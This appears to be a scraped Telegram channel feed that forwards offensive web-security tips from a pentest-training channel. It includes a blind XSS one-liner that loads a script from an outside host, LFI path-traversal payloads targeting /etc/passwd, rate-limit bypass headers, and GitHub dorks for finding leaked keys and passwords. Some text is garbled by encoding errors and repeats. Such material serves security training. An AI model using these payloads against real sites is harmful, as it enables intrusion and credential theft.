Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
One Liner To Find Blind XSS
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
Testing Authentication Flaws in Web Application
๐1
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
Some filter bypass payload list while hunting for LFi vulnerability
โindex.php?page=....//....//etc/passwd
โindex.php?page=..///////..////..//////etc/passwd
โindex.php?page=/var/www/../../etc/passwd
โindex.php?page=....//....//etc/passwd
โindex.php?page=..///////..////..//////etc/passwd
โindex.php?page=/var/www/../../etc/passwd
๐3
Rate limit bypass using some custom headers:
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
โคโ๐ฅ8๐1๐1๐ณ1
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
Github Dorks Cheatsheet
Find files with sensitive info, API Keys, Tokens and Passwords.
+ list of github dorks automation tools
Find files with sensitive info, API Keys, Tokens and Passwords.
+ list of github dorks automation tools
๐18๐4๐คฎ2
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
Chrome has just unleashed popovers: modal dialogs without JS! Of course you can abuse them for XSS filter evasion
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
WhatsApp'ta Cyber Security kanalฤฑnฤฑ takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q
WhatsApp.com
Cyber Security | WhatsApp Channel
Cyber Security WhatsApp Channel. . 385 followers
Cross-Site Request Forgery
https://www.saygili.org/2020/11/cross-site-request-forgery.html
https://www.saygili.org/2020/11/cross-site-request-forgery.html
Erhan SAYGILI
Cross-Site Request Forgery
๐1